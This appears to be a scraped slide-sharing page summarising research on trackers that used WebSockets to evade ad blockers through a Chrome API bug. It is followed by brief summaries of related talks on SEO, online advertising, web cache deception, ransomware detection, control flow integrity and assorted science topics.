Web tracking companies were able to circumvent ad blockers by leveraging a bug in the Chrome webRequest API. The bug caused websocket requests to not trigger the API, allowing tracking companies to use websockets to bypass ad blockers. Researchers analyzed crawls of 100k websites before and after the bug was patched. They found around 2% of sites used websockets, with 61% initiated by advertisers/analytics companies. 71% of websockets contacted these companies. The number of unique tracking companies dropped after the bug was patched in Chrome 58.
How Tracking Companies Circumvent Ad Blockers Using WebSocketsSajjad "JJ" Arshad
The document discusses how advertising and analytics companies were able to circumvent ad blockers by leveraging a bug in the Chrome API that allowed WebSocket requests to bypass extension inspection. The authors crawled over 100,000 websites before and after the bug was patched to analyze the use of WebSockets by these companies. They found that around 2% of sites used WebSockets, and 55-73% of WebSocket connections were initiated by or contacted advertising and analytics domains. The number of unique advertising domain initiators dropped after the bug was patched in Chrome 58.
GDD Japan 2009 - Designing OpenSocial Apps For Speed and ScalePatrick Chanezon
Google Developer Days Japan 2009 - Designing OpenSocial Apps For Speed and Scale
Original slides from Arne Roomann-Kurrik & Chris Chabot with a few Zen quotes and references added by me:-)
This document provides tips and best practices for using social media and search engines for PR purposes. It discusses monitoring brands for free using tools like Google Alerts and social media sites. It also covers setting up a reputation monitoring dashboard using RSS feeds and aggregators. Various social media release and newsroom templates are presented as new tools for PR. Tips are provided on managing agencies and having realistic expectations for social media campaigns.
SEO Tools For Marketers - Seo tools for youUy Hoàng
http://seotools4you.com/
It's a app to analyze your site visitors and analyze any site's information such as alexa
data,similarWeb data, whois data, social media data, moz check, dmoz check, search engine
index, google page rank, IP analysis, malware check etc. combined with some other great SEO
tools such as link analysis, keyword position analysis, auto keyword suggestion,page status
check, backlink creation/search, website ping, google adword scraper etc.
You will get some bonus utility tools such as email encoder/decoder, metatag generator,
ogtag generator, plgiarism check, valid email check, duplicate email filter, url encode/decode,
robot code generator etc.
It has native API by which developers can integrate it's facilities with another app.
Nice colorful widgets are available. You can simply copy & paste some line of codes to any
page you want and can display site information.
The document discusses white hat cloaking techniques and provides 6 practical scenarios where cloaking can be implemented appropriately. It covers how to detect search engine robots, deliver different content to robots versus users, and risks associated with cloaking. The last section provides next steps and additional resources on white hat cloaking and Google's policies.
The document discusses various options for obtaining datasets, including finding existing datasets from sources like data journalism sites, academic sites, government sites, and lists of datasets. It also discusses generating new datasets by scraping data from websites or using APIs. While APIs provide structured governed data, web scraping allows retrieving any visible data but is more complex and customizable. Factors like robots.txt files, CAPTCHAs, dynamic content, and honeypot traps must be considered for web scraping.
This document discusses the importance of usability in websites. It notes that over 83% of users will leave a website if it takes too many clicks to find what they are looking for, and $25 billion is lost every year due to usability issues. The document then examines existing tools to evaluate website usability, including tools that obtain feedback from experts, track real user behavior and actions, and check for compliance with usability guidelines. It also references a Netcraft report finding that only 29.3% of existing websites are currently active, suggesting that websites need to be usable or users will stop using them.
The document discusses online branding and identity. It provides tips for optimizing a company's website and online presence, including ensuring the website is regularly updated and useful to employees. It also discusses the importance of search engine optimization and rankings, online reputation monitoring, and using tools like Google Analytics.
How Tracking Companies Circumvent Ad Blockers Using WebSocketsSajjad "JJ" Arshad
The document discusses how advertising and analytics companies were able to circumvent ad blockers by leveraging a bug in the Chrome API that allowed WebSocket requests to bypass extension inspection. The authors crawled over 100,000 websites before and after the bug was patched to analyze the use of WebSockets by these companies. They found that around 2% of sites used WebSockets, and 55-73% of WebSocket connections were initiated by or contacted advertising and analytics domains. The number of unique advertising domain initiators dropped after the bug was patched in Chrome 58.
GDD Japan 2009 - Designing OpenSocial Apps For Speed and ScalePatrick Chanezon
Google Developer Days Japan 2009 - Designing OpenSocial Apps For Speed and Scale
Original slides from Arne Roomann-Kurrik & Chris Chabot with a few Zen quotes and references added by me:-)
This document provides tips and best practices for using social media and search engines for PR purposes. It discusses monitoring brands for free using tools like Google Alerts and social media sites. It also covers setting up a reputation monitoring dashboard using RSS feeds and aggregators. Various social media release and newsroom templates are presented as new tools for PR. Tips are provided on managing agencies and having realistic expectations for social media campaigns.
SEO Tools For Marketers - Seo tools for youUy Hoàng
http://seotools4you.com/
It's a app to analyze your site visitors and analyze any site's information such as alexa
data,similarWeb data, whois data, social media data, moz check, dmoz check, search engine
index, google page rank, IP analysis, malware check etc. combined with some other great SEO
tools such as link analysis, keyword position analysis, auto keyword suggestion,page status
check, backlink creation/search, website ping, google adword scraper etc.
You will get some bonus utility tools such as email encoder/decoder, metatag generator,
ogtag generator, plgiarism check, valid email check, duplicate email filter, url encode/decode,
robot code generator etc.
It has native API by which developers can integrate it's facilities with another app.
Nice colorful widgets are available. You can simply copy & paste some line of codes to any
page you want and can display site information.
The document discusses white hat cloaking techniques and provides 6 practical scenarios where cloaking can be implemented appropriately. It covers how to detect search engine robots, deliver different content to robots versus users, and risks associated with cloaking. The last section provides next steps and additional resources on white hat cloaking and Google's policies.
The document discusses various options for obtaining datasets, including finding existing datasets from sources like data journalism sites, academic sites, government sites, and lists of datasets. It also discusses generating new datasets by scraping data from websites or using APIs. While APIs provide structured governed data, web scraping allows retrieving any visible data but is more complex and customizable. Factors like robots.txt files, CAPTCHAs, dynamic content, and honeypot traps must be considered for web scraping.
This document discusses the importance of usability in websites. It notes that over 83% of users will leave a website if it takes too many clicks to find what they are looking for, and $25 billion is lost every year due to usability issues. The document then examines existing tools to evaluate website usability, including tools that obtain feedback from experts, track real user behavior and actions, and check for compliance with usability guidelines. It also references a Netcraft report finding that only 29.3% of existing websites are currently active, suggesting that websites need to be usable or users will stop using them.
The document discusses online branding and identity. It provides tips for optimizing a company's website and online presence, including ensuring the website is regularly updated and useful to employees. It also discusses the importance of search engine optimization and rankings, online reputation monitoring, and using tools like Google Analytics.
The document discusses online branding and identity. It provides tips for how companies can optimize their online presence through search engine optimization and monitoring their online reputation. Specific tips include having an updated, useful website; ranking well for desired search terms; monitoring brand mentions on search engines, social media, and review sites; and using tools like Google Analytics and RSS feeds.
Tracing Information Flows Between Ad Exchanges Using Retargeted AdsSajjad "JJ" Arshad
This document discusses a methodology for identifying information flows between online advertising exchanges by analyzing retargeted ads. The researchers collected data by simulating user personas that visited various websites and publishers. They identified over 31,000 ads, which were then labeled through crowdsourcing. They analyzed the resulting dataset to classify over 35,000 "publisher-side chains" that served retargeted ads into four categories: direct matching, cookie matching, indirect matching, and latent/server-side matching. This categorization provides insight into how advertisers identify users across different exchanges and publishers.
Omniture is an online marketing and web analytics company that was acquired by Adobe in 2009. It offers various products for web analytics, testing, data mining, search optimization, recommendations, and more. Its flagship product is SiteCatalyst, which provides real-time intelligence about online strategies and marketing initiatives to help marketers optimize their websites.
Discussion starter at Future of Privacy Forum in Washington, DC. Johnny Ryan
The document describes the process of real-time bidding in online advertising. It shows how user data is broadcast to hundreds of companies in bid requests, allowing the profiling of users and leakage of personal data. This data leakage supports untrustworthy websites by enabling them to receive advertising revenue.
This document discusses web browsers and search engines. It provides information on popular browsers like Google Chrome, Firefox and Safari and their respective market shares. It also discusses how browsers generate revenue mainly through advertisements from search engine companies. The document also discusses the first web browser and search engine invented. It provides information on how search engines work and how they are ranked. It notes Google has the largest market share for search engines and that search engines mainly generate revenue through advertisements on their platforms.
Web crawling involves automated programs called crawlers or spiders that browse the web methodically to index web pages for search engines. Crawlers start from seed URLs and extract links from visited pages to discover new pages, repeating the process until a desired size or time limit is reached. Crawlers are used by search engines to build indexes of web content and ensure freshness through revisiting URLs. Challenges include the web's large size, fast changes, and dynamic content generation. APIs allow programmatic access to web services and information through REST, HTTP POST, and SOAP.
The document discusses branding and online presence. It begins by asking questions about whether a company's website is useful, updated regularly, and helps employees. It notes that potential customers first learn about a company through online searches and impressions. The document then discusses Google search metrics like findability, linkability, relevance and differentiation that determine search rankings. It provides an example comparing search results for British Airways and Virgin Atlantic, finding Virgin Atlantic scores higher. The document concludes by offering tips for monitoring brands for free using tools like Google Alerts, analytics and RSS feeds.
This document discusses Wise's migration from browser-side Google Analytics 4 (GA4) tagging to server-side GA4 tagging. It provides an overview of Wise as a company, the motivation for migrating to server-side tagging, and the benefits realized, including improved site speed, reduced reliance on third-party cookies, a smaller content security policy, and better privacy and compliance through full control over data shared with third parties. It also covers what server-side tagging is, how it differs from browser-side tagging, and tips for setting it up and preparing for production use.
This PDF will give a deeper understating about
How search works ?
How a website works ?
How SEO works ?
For more information check our website
www.praveenkurup.com
This document provides an introduction to search engines and related concepts. It defines a search engine as software that systematically searches the web. It explains that a search engine results page (SERP) is the page returned by a search engine in response to a user's query. It also describes how search engines work through crawling, indexing, and ranking webpages. It then discusses different types of search engines, domains, web hosting, URLs, and how to identify niche target audiences for digital marketing.
The document discusses various methods for tracking digital performance, including on-network and off-network measurements. It notes the importance of aligning measurements with business objectives and considering unintended consequences. Cookies and tracking codes are described as the backbone of online measurement and targeting. Issues around online advertising metrics like unique visitors and discrepancies between data sources are also summarized.
Mark Harwood - Building Entity Centric Indexes - NoSQL matters Dublin 2015NoSQLmatters
Sometimes we need to step back and take a look at the bigger picture - not just counting huge piles of individual log records, but reasoning about the behaviors of the people who are ultimately generating this firehose of data. While your DevOps folks care deeply about log records from a machine utlization perspective, marketing wants to know what these records tell us about the customers' needs. Elasticsearch Aggregations are a great feature but are not a panacea. We can happily use them to summarise complex things like the number of web requests per day broken down by geography and browser type on a busy website, but we would quickly run out of memory if we tried to calculate something as simple as a single number for the average duration of visitor web sessions when using the very same dataset. Why does this occur? A web session duration is an example of a behavioural attribute not held on any one log record; it has to be derived by finding the first and last records for each session in our weblogs, requiring some complex query expressions and a lot of memory to connect all the data points. We can maintain a more useful joined-up-picture if we run an ongoing background process to fuse related events from one index into ?entity-centric? summaries in another index e.g: • Web log events summarised into ?web session? entities • Road-worthiness test results summarised into ?car? entities • Reviews in a marketplace summarised into a ?reviewer? entity Using real data, this session will demonstrate how to incrementally build entity-centric indexes alongside event-centric indexes by using simple scripts to uncover interesting behaviours that accumulate over time. We'll explore: • Which cars are driven long distances after failing roadworthiness tests? • Which website visitors look to be behaving like ?bots?? • Which seller in my marketplace has employed an army of ?shills? to boost his feedback rating? Attendees will leave this session with all the tools required to begin building entity-centric indexes and using that data to derive richer business insights across every department in their organization.
iCrossing: Designing For Visibility - ANA Digital Marketing And Social Media...iCrossing
"Findability and Usability: How Designing for Visibility Paid Off for Combined Insurance"
As presented by Rob Garner, Director, Strategy for iCrossing on Wednesday, January 27, 2010 at the ANA Digital Marketing and Social Media Day in Houston, TX.
Designing Websites for Visibility, Rob Garner at the Association of National ...Rob Garner
Presentation covering the search-informed website redesign process, along with a case study for CombinedInsurance.com. Presented at the Association of National Advertisers conference in Houston, Texas, January, 2010 by Rob Garner.
AMP is coming to improve the mobile web. Big time.
There are many aspect to a great user experience on sites.
In order to improve the speed of the media websites on mobile and the monetization, we needed few things:
1. Fast pages. Fast to load, fast to display, saving bandwidth when possible.
2. Easy for the developers and companies to create. Only based on known and widely used technologies.
3. Mobile Friendly: they should respect a standard and thanks to this standard, pages would be automatically optimized for mobile devices
4. Embrace the open web: non-proprietary technology, open source, available to anyone to use and improve. It should not only help for search engines, but for everyone.
In these slides, we will cover AMP and what it can do for you.
This document provides tips and strategies for using Google tools like Google Alerts, RSS feeds, and dashboards to monitor brands and stay up-to-date on relevant information from websites, blogs, and news sources. It discusses how to set up Google Alerts and RSS feeds to track keywords, competitors, and industry news. It also gives examples of using RSS feeds to monitor specific company websites and blogs for press releases or updates.
Successful companies today embraced 2.0 long before the term was coined. This panel will explore the various definitions of Web 2.0 through the lenses of pioneers and performance marketing companies.
This chapter discusses search engine optimization and promotion. It describes the components of search engines like robots that index pages, databases to store page data, and search forms. It provides tips for designing pages friendly to search engines through keywords, descriptions, and on-page elements. The chapter outlines submitting a site to search engines, monitoring listings, and other promotion methods like social media, QR codes, and affiliate programs. It also introduces inline frames that can embed one page within another.
This document summarizes research into a technique called Web Cache Deception (WCD) where the server and cache interpret URLs differently, potentially leaking sensitive information. The researchers:
1. Developed a methodology to automatically test 349 popular sites for WCD vulnerabilities by appending fake file extensions and comparing responses from authenticated vs unauthenticated requests.
2. Found that 37 sites (10.7%) containing over 50,000 pages were vulnerable, leaking things like PII, tokens, and keys. Sophisticated attacks were also possible like CSRF token bypass and session hijacking.
3. Experimenting with novel "path confusion" techniques increased the detection rate by 45%, showing caches are often not aware of
This document summarizes research into web cache deception (WCD) vulnerabilities. The researchers investigated WCD prevalence on popular domains, whether it exposes private information, if it can bypass authentication, and if variations increase exploitation. They found 26 sites vulnerable, with 14 leaking private data like names and emails. Defenses like caching location and expiration windows limited but did not prevent exploitation. Variations in path confusion techniques increased successful attacks. They conclude that correctly configuring caches is difficult and WCD is a systemic problem involving multiple technologies.
More Related Content
Similar to How Tracking Companies Circumvented Ad Blockers Using WebSockets
The document discusses online branding and identity. It provides tips for how companies can optimize their online presence through search engine optimization and monitoring their online reputation. Specific tips include having an updated, useful website; ranking well for desired search terms; monitoring brand mentions on search engines, social media, and review sites; and using tools like Google Analytics and RSS feeds.
Tracing Information Flows Between Ad Exchanges Using Retargeted AdsSajjad "JJ" Arshad
This document discusses a methodology for identifying information flows between online advertising exchanges by analyzing retargeted ads. The researchers collected data by simulating user personas that visited various websites and publishers. They identified over 31,000 ads, which were then labeled through crowdsourcing. They analyzed the resulting dataset to classify over 35,000 "publisher-side chains" that served retargeted ads into four categories: direct matching, cookie matching, indirect matching, and latent/server-side matching. This categorization provides insight into how advertisers identify users across different exchanges and publishers.
Omniture is an online marketing and web analytics company that was acquired by Adobe in 2009. It offers various products for web analytics, testing, data mining, search optimization, recommendations, and more. Its flagship product is SiteCatalyst, which provides real-time intelligence about online strategies and marketing initiatives to help marketers optimize their websites.
Discussion starter at Future of Privacy Forum in Washington, DC. Johnny Ryan
The document describes the process of real-time bidding in online advertising. It shows how user data is broadcast to hundreds of companies in bid requests, allowing the profiling of users and leakage of personal data. This data leakage supports untrustworthy websites by enabling them to receive advertising revenue.
This document discusses web browsers and search engines. It provides information on popular browsers like Google Chrome, Firefox and Safari and their respective market shares. It also discusses how browsers generate revenue mainly through advertisements from search engine companies. The document also discusses the first web browser and search engine invented. It provides information on how search engines work and how they are ranked. It notes Google has the largest market share for search engines and that search engines mainly generate revenue through advertisements on their platforms.
Web crawling involves automated programs called crawlers or spiders that browse the web methodically to index web pages for search engines. Crawlers start from seed URLs and extract links from visited pages to discover new pages, repeating the process until a desired size or time limit is reached. Crawlers are used by search engines to build indexes of web content and ensure freshness through revisiting URLs. Challenges include the web's large size, fast changes, and dynamic content generation. APIs allow programmatic access to web services and information through REST, HTTP POST, and SOAP.
The document discusses branding and online presence. It begins by asking questions about whether a company's website is useful, updated regularly, and helps employees. It notes that potential customers first learn about a company through online searches and impressions. The document then discusses Google search metrics like findability, linkability, relevance and differentiation that determine search rankings. It provides an example comparing search results for British Airways and Virgin Atlantic, finding Virgin Atlantic scores higher. The document concludes by offering tips for monitoring brands for free using tools like Google Alerts, analytics and RSS feeds.
This document discusses Wise's migration from browser-side Google Analytics 4 (GA4) tagging to server-side GA4 tagging. It provides an overview of Wise as a company, the motivation for migrating to server-side tagging, and the benefits realized, including improved site speed, reduced reliance on third-party cookies, a smaller content security policy, and better privacy and compliance through full control over data shared with third parties. It also covers what server-side tagging is, how it differs from browser-side tagging, and tips for setting it up and preparing for production use.
This PDF will give a deeper understating about
How search works ?
How a website works ?
How SEO works ?
For more information check our website
www.praveenkurup.com
This document provides an introduction to search engines and related concepts. It defines a search engine as software that systematically searches the web. It explains that a search engine results page (SERP) is the page returned by a search engine in response to a user's query. It also describes how search engines work through crawling, indexing, and ranking webpages. It then discusses different types of search engines, domains, web hosting, URLs, and how to identify niche target audiences for digital marketing.
The document discusses various methods for tracking digital performance, including on-network and off-network measurements. It notes the importance of aligning measurements with business objectives and considering unintended consequences. Cookies and tracking codes are described as the backbone of online measurement and targeting. Issues around online advertising metrics like unique visitors and discrepancies between data sources are also summarized.
Mark Harwood - Building Entity Centric Indexes - NoSQL matters Dublin 2015NoSQLmatters
Sometimes we need to step back and take a look at the bigger picture - not just counting huge piles of individual log records, but reasoning about the behaviors of the people who are ultimately generating this firehose of data. While your DevOps folks care deeply about log records from a machine utlization perspective, marketing wants to know what these records tell us about the customers' needs. Elasticsearch Aggregations are a great feature but are not a panacea. We can happily use them to summarise complex things like the number of web requests per day broken down by geography and browser type on a busy website, but we would quickly run out of memory if we tried to calculate something as simple as a single number for the average duration of visitor web sessions when using the very same dataset. Why does this occur? A web session duration is an example of a behavioural attribute not held on any one log record; it has to be derived by finding the first and last records for each session in our weblogs, requiring some complex query expressions and a lot of memory to connect all the data points. We can maintain a more useful joined-up-picture if we run an ongoing background process to fuse related events from one index into ?entity-centric? summaries in another index e.g: • Web log events summarised into ?web session? entities • Road-worthiness test results summarised into ?car? entities • Reviews in a marketplace summarised into a ?reviewer? entity Using real data, this session will demonstrate how to incrementally build entity-centric indexes alongside event-centric indexes by using simple scripts to uncover interesting behaviours that accumulate over time. We'll explore: • Which cars are driven long distances after failing roadworthiness tests? • Which website visitors look to be behaving like ?bots?? • Which seller in my marketplace has employed an army of ?shills? to boost his feedback rating? Attendees will leave this session with all the tools required to begin building entity-centric indexes and using that data to derive richer business insights across every department in their organization.
iCrossing: Designing For Visibility - ANA Digital Marketing And Social Media...iCrossing
"Findability and Usability: How Designing for Visibility Paid Off for Combined Insurance"
As presented by Rob Garner, Director, Strategy for iCrossing on Wednesday, January 27, 2010 at the ANA Digital Marketing and Social Media Day in Houston, TX.
Designing Websites for Visibility, Rob Garner at the Association of National ...Rob Garner
Presentation covering the search-informed website redesign process, along with a case study for CombinedInsurance.com. Presented at the Association of National Advertisers conference in Houston, Texas, January, 2010 by Rob Garner.
AMP is coming to improve the mobile web. Big time.
There are many aspect to a great user experience on sites.
In order to improve the speed of the media websites on mobile and the monetization, we needed few things:
1. Fast pages. Fast to load, fast to display, saving bandwidth when possible.
2. Easy for the developers and companies to create. Only based on known and widely used technologies.
3. Mobile Friendly: they should respect a standard and thanks to this standard, pages would be automatically optimized for mobile devices
4. Embrace the open web: non-proprietary technology, open source, available to anyone to use and improve. It should not only help for search engines, but for everyone.
In these slides, we will cover AMP and what it can do for you.
This document provides tips and strategies for using Google tools like Google Alerts, RSS feeds, and dashboards to monitor brands and stay up-to-date on relevant information from websites, blogs, and news sources. It discusses how to set up Google Alerts and RSS feeds to track keywords, competitors, and industry news. It also gives examples of using RSS feeds to monitor specific company websites and blogs for press releases or updates.
Successful companies today embraced 2.0 long before the term was coined. This panel will explore the various definitions of Web 2.0 through the lenses of pioneers and performance marketing companies.
This chapter discusses search engine optimization and promotion. It describes the components of search engines like robots that index pages, databases to store page data, and search forms. It provides tips for designing pages friendly to search engines through keywords, descriptions, and on-page elements. The chapter outlines submitting a site to search engines, monitoring listings, and other promotion methods like social media, QR codes, and affiliate programs. It also introduces inline frames that can embed one page within another.
Similar to How Tracking Companies Circumvented Ad Blockers Using WebSockets (20)
This document summarizes research into a technique called Web Cache Deception (WCD) where the server and cache interpret URLs differently, potentially leaking sensitive information. The researchers:
1. Developed a methodology to automatically test 349 popular sites for WCD vulnerabilities by appending fake file extensions and comparing responses from authenticated vs unauthenticated requests.
2. Found that 37 sites (10.7%) containing over 50,000 pages were vulnerable, leaking things like PII, tokens, and keys. Sophisticated attacks were also possible like CSRF token bypass and session hijacking.
3. Experimenting with novel "path confusion" techniques increased the detection rate by 45%, showing caches are often not aware of
This document summarizes research into web cache deception (WCD) vulnerabilities. The researchers investigated WCD prevalence on popular domains, whether it exposes private information, if it can bypass authentication, and if variations increase exploitation. They found 26 sites vulnerable, with 14 leaking private data like names and emails. Defenses like caching location and expiration windows limited but did not prevent exploitation. Variations in path confusion techniques increased successful attacks. They conclude that correctly configuring caches is difficult and WCD is a systemic problem involving multiple technologies.
This document discusses web cache deception techniques that can be used to exploit vulnerabilities in how web caches handle URLs. It begins with background on web caching and the concept of path confusion. It then explains basic and advanced techniques for web cache deception, including using URL encoding, and discusses observations like bypassing CSRF protections and hijacking sessions. The document concludes that correctly configuring caches is challenging, as complex interactions between technologies can be exploited in unintended ways, and variations of these techniques increase the number of vulnerable sites.
HotFuzz: Discovering Algorithmic Denial-of-Service Vulnerabilities Through Gu...Sajjad "JJ" Arshad
This document introduces HotFuzz, a micro-fuzzing technique for detecting algorithmic complexity (AC) bugs in Java libraries. It generates test inputs using strategies like identity value instantiation and small recursive instantiation. When evaluated on several libraries, HotFuzz detected 158 AC bugs. As an example, it found an AC bug in BigDecimal that causes computation to take hours due to deep recursion when large values are used, which could enable denial-of-service attacks.
Large-Scale Analysis of Style Injection by Relative Path OverwriteSajjad "JJ" Arshad
This document summarizes research on a new type of web attack called relative path overwrite, which allows attackers to inject CSS (style) directives into websites without requiring markup or script injection. The researchers measured how many popular websites are vulnerable by testing URL manipulation techniques on over 2.6 billion web pages. They found that over 5% of domains allowed style injection, but fewer than 1% could be successfully exploited in Chrome or Internet Explorer due to requirements like the page loading in quirks mode. The researchers outline countermeasures for websites to prevent this attack, such as using absolute paths or base tags for stylesheets instead of relative paths.
UNVEIL: A Large-Scale, Automated Approach to Detecting RansomwareSajjad "JJ" Arshad
This document summarizes a research paper on developing an automated approach called UNVEIL to detect ransomware. UNVEIL generates fake user environments and monitors filesystem activity to extract IO access sequences that are characteristic of ransomware families. It was evaluated on 3500 known ransomware samples with 100% precision and recall. During testing on over 148,000 unknown samples, UNVEIL discovered a previously unknown ransomware family called SilentCrypt. The researchers conclude UNVEIL is useful in practice for detecting ransomware.
Practical Challenges of Type Checking in Control Flow IntegritySajjad "JJ" Arshad
This document discusses the practical challenges of using type checking to improve control flow integrity (CFI). Type checking allows control transfers only if the caller and callee types match, which can provide a more precise control flow graph (CFG). However, type checking faces challenges for deployment in C/C++, such as type collisions, lack of type diversification, and covariant return types. Resolving these issues, such as through global type diversification, complicates dynamic loading and separate compilation. The document provides examples and data on type collisions found in popular applications to illustrate these challenges.
Thou Shalt Not Depend on Me: Analysing the Use of Outdated JavaScript Librari...Sajjad "JJ" Arshad
This document summarizes a study of outdated and vulnerable JavaScript library usage on websites. The study found that 87% of Alexa top websites include third-party JavaScript libraries, and 38% use a known vulnerable version. 61% use an outdated version not at the latest patch level. Reasons for this include a lack of vulnerability information and backwards compatible patches for libraries. The study modeled element creation relationships to analyze how libraries are indirectly included, such as through ads.
The document analyzes the adoption and effectiveness of the ads.txt standard over time. It was introduced by the IAB in 2017 to combat domain spoofing fraud in real-time bidding (RTB) online advertising auctions. The authors collected ads.txt files from Alexa top 100k publishers between 2018-2019 and analyzed the number of authorized ad exchanges listed and compliance with the standard format. They found an increase in unique authorized exchanges listed from 860 to 1400, but also identified syntax errors and other mistakes in some ads.txt files that did not fully comply with the standard. The goal is to evaluate ads.txt's ability to provide transparency and address fraud in the complex RTB advertising ecosystem.
"Recommended For You": A First Look at Content Recommendation NetworksSajjad "JJ" Arshad
This document summarizes a study of content recommendation networks (CRNs) that found:
- Outbrain and Taboola were the largest CRNs, displaying the most ads on average per page.
- Most widget headlines did not explicitly label ads as advertisements.
- Nearly all widgets had disclosures, except for ZergNet which only disclosed 24% of the time.
- 11.9% of widgets displayed mixed recommended and advertising content.
- Advertised topics included listicles, credit cards, celebrity gossip, and mortgages. Financial services were commonly advertised.
Include Me Out: In-Browser Detection of Malicious Third-Party Content InclusionsSajjad "JJ" Arshad
This document proposes a method called Excision to detect malicious third-party content inclusions in web pages before attacks occur. Excision builds inclusion trees to model relationships between remotely loaded resources, extracts features from these trees, and uses pre-trained models to classify inclusion sequences as benign or malicious. An evaluation found Excision could detect 177 new malicious hosts before they appeared in blacklists, with only moderate performance overhead.
On the Effectiveness of Type-based Control Flow IntegritySajjad "JJ" Arshad
This document evaluates the effectiveness of type-based control flow integrity (RTC) defenses. It finds that while RTC can prevent some attacks, it has limitations. Typed return-oriented programming (TROP) exploits rare type collisions between function pointers and "execution gadgets" to hijack control flow in real-world applications like Nginx. While RTC is more practical than points-to analysis, it is not sufficient on its own due to challenges like separate compilation and support for assembly code. Overall, RTC improves security but attackers can still leverage nested function collisions and abundant "gadgets" to bypass its protections.
The debris of the ‘last major merger’ is dynamically youngSérgio Sacani
The Milky Way’s (MW) inner stellar halo contains an [Fe/H]-rich component with highly eccentric orbits, often referred to as the
‘last major merger.’ Hypotheses for the origin of this component include Gaia-Sausage/Enceladus (GSE), where the progenitor
collided with the MW proto-disc 8–11 Gyr ago, and the Virgo Radial Merger (VRM), where the progenitor collided with the
MW disc within the last 3 Gyr. These two scenarios make different predictions about observable structure in local phase space,
because the morphology of debris depends on how long it has had to phase mix. The recently identified phase-space folds in Gaia
DR3 have positive caustic velocities, making them fundamentally different than the phase-mixed chevrons found in simulations
at late times. Roughly 20 per cent of the stars in the prograde local stellar halo are associated with the observed caustics. Based
on a simple phase-mixing model, the observed number of caustics are consistent with a merger that occurred 1–2 Gyr ago.
We also compare the observed phase-space distribution to FIRE-2 Latte simulations of GSE-like mergers, using a quantitative
measurement of phase mixing (2D causticality). The observed local phase-space distribution best matches the simulated data
1–2 Gyr after collision, and certainly not later than 3 Gyr. This is further evidence that the progenitor of the ‘last major merger’
did not collide with the MW proto-disc at early times, as is thought for the GSE, but instead collided with the MW disc within
the last few Gyr, consistent with the body of work surrounding the VRM.
The use of Nauplii and metanauplii artemia in aquaculture (brine shrimp).pptxMAGOTI ERNEST
Although Artemia has been known to man for centuries, its use as a food for the culture of larval organisms apparently began only in the 1930s, when several investigators found that it made an excellent food for newly hatched fish larvae (Litvinenko et al., 2023). As aquaculture developed in the 1960s and ‘70s, the use of Artemia also became more widespread, due both to its convenience and to its nutritional value for larval organisms (Arenas-Pardo et al., 2024). The fact that Artemia dormant cysts can be stored for long periods in cans, and then used as an off-the-shelf food requiring only 24 h of incubation makes them the most convenient, least labor-intensive, live food available for aquaculture (Sorgeloos & Roubach, 2021). The nutritional value of Artemia, especially for marine organisms, is not constant, but varies both geographically and temporally. During the last decade, however, both the causes of Artemia nutritional variability and methods to improve poorquality Artemia have been identified (Loufi et al., 2024).
Brine shrimp (Artemia spp.) are used in marine aquaculture worldwide. Annually, more than 2,000 metric tons of dry cysts are used for cultivation of fish, crustacean, and shellfish larva. Brine shrimp are important to aquaculture because newly hatched brine shrimp nauplii (larvae) provide a food source for many fish fry (Mozanzadeh et al., 2021). Culture and harvesting of brine shrimp eggs represents another aspect of the aquaculture industry. Nauplii and metanauplii of Artemia, commonly known as brine shrimp, play a crucial role in aquaculture due to their nutritional value and suitability as live feed for many aquatic species, particularly in larval stages (Sorgeloos & Roubach, 2021).
hematic appreciation test is a psychological assessment tool used to measure an individual's appreciation and understanding of specific themes or topics. This test helps to evaluate an individual's ability to connect different ideas and concepts within a given theme, as well as their overall comprehension and interpretation skills. The results of the test can provide valuable insights into an individual's cognitive abilities, creativity, and critical thinking skills
Deep Behavioral Phenotyping in Systems Neuroscience for Functional Atlasing a...Ana Luísa Pinho
Functional Magnetic Resonance Imaging (fMRI) provides means to characterize brain activations in response to behavior. However, cognitive neuroscience has been limited to group-level effects referring to the performance of specific tasks. To obtain the functional profile of elementary cognitive mechanisms, the combination of brain responses to many tasks is required. Yet, to date, both structural atlases and parcellation-based activations do not fully account for cognitive function and still present several limitations. Further, they do not adapt overall to individual characteristics. In this talk, I will give an account of deep-behavioral phenotyping strategies, namely data-driven methods in large task-fMRI datasets, to optimize functional brain-data collection and improve inference of effects-of-interest related to mental processes. Key to this approach is the employment of fast multi-functional paradigms rich on features that can be well parametrized and, consequently, facilitate the creation of psycho-physiological constructs to be modelled with imaging data. Particular emphasis will be given to music stimuli when studying high-order cognitive mechanisms, due to their ecological nature and quality to enable complex behavior compounded by discrete entities. I will also discuss how deep-behavioral phenotyping and individualized models applied to neuroimaging data can better account for the subject-specific organization of domain-general cognitive systems in the human brain. Finally, the accumulation of functional brain signatures brings the possibility to clarify relationships among tasks and create a univocal link between brain systems and mental functions through: (1) the development of ontologies proposing an organization of cognitive processes; and (2) brain-network taxonomies describing functional specialization. To this end, tools to improve commensurability in cognitive science are necessary, such as public repositories, ontology-based platforms and automated meta-analysis tools. I will thus discuss some brain-atlasing resources currently under development, and their applicability in cognitive as well as clinical neuroscience.
BREEDING METHODS FOR DISEASE RESISTANCE.pptxRASHMI M G
Plant breeding for disease resistance is a strategy to reduce crop losses caused by disease. Plants have an innate immune system that allows them to recognize pathogens and provide resistance. However, breeding for long-lasting resistance often involves combining multiple resistance genes
Or: Beyond linear.
Abstract: Equivariant neural networks are neural networks that incorporate symmetries. The nonlinear activation functions in these networks result in interesting nonlinear equivariant maps between simple representations, and motivate the key player of this talk: piecewise linear representation theory.
Disclaimer: No one is perfect, so please mind that there might be mistakes and typos.
dtubbenhauer@gmail.com
Corrected slides: dtubbenhauer.com/talks.html
What is greenhouse gasses and how many gasses are there to affect the Earth.moosaasad1975
What are greenhouse gasses how they affect the earth and its environment what is the future of the environment and earth how the weather and the climate effects.
Comparing Evolved Extractive Text Summary Scores of Bidirectional Encoder Rep...University of Maribor
Slides from:
11th International Conference on Electrical, Electronics and Computer Engineering (IcETRAN), Niš, 3-6 June 2024
Track: Artificial Intelligence
https://www.etran.rs/2024/en/home-english/
Nucleophilic Addition of carbonyl compounds.pptxSSR02
Nucleophilic addition is the most important reaction of carbonyls. Not just aldehydes and ketones, but also carboxylic acid derivatives in general.
Carbonyls undergo addition reactions with a large range of nucleophiles.
Comparing the relative basicity of the nucleophile and the product is extremely helpful in determining how reversible the addition reaction is. Reactions with Grignards and hydrides are irreversible. Reactions with weak bases like halides and carboxylates generally don’t happen.
Electronic effects (inductive effects, electron donation) have a large impact on reactivity.
Large groups adjacent to the carbonyl will slow the rate of reaction.
Neutral nucleophiles can also add to carbonyls, although their additions are generally slower and more reversible. Acid catalysis is sometimes employed to increase the rate of addition.
